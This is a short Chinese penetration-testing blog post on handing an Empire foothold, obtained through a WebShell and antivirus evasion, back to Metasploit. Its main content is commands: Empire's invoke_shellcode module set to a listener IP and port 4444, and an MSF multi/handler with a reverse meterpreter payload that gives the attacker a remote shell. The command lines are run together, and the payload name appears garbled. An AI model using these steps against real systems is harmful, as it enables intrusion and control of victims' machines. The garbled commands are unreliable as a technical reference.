渗透之——Empire 反弹回 Metasploit(渗透 释义)

网友投稿 280 2022-10-02


渗透之——Empire 反弹回 Metasploit(渗透 释义)

在实际渗透中,当拿到WebShell上传的MSF客户端无法绕过目标主机的杀毒软件时,可以使用PowerShell来绕过,也可以执行Empire的Payload来绕过,成功之后再使用Empiore的模块将其反弹回Metasploit。

这里使用Empire的usemodule code_execution/invoke_shellcode模块修改两个参数:Lhost、Lport。将Lhost修改为MSF所在主机的IP,按以下命令设置:

set Lhost 192.168.31.247set Lport 4444

在MSF上设置监听,命令如下:

use exploit/multi/handlerset payload windows/meterpreter/reverse_lhost 192.168.31.247set lport 4444run

运行后,就可以收到Empire反弹回来的Shell


版权声明:本文内容由网络用户投稿,版权归原作者所有,本站不拥有其著作权,亦不承担相应法律责任。如果您发现本站中有涉嫌抄袭或描述失实的内容,请联系我们jiasou666@gmail.com 处理,核实后本网站将在24小时内删除侵权内容。

上一篇:Metasploit之——高级扩展功能(metasploit模块详解)
下一篇:Spring实现HikariCP连接池的示例代码
相关文章

 发表评论

暂时没有评论,来抢沙发吧~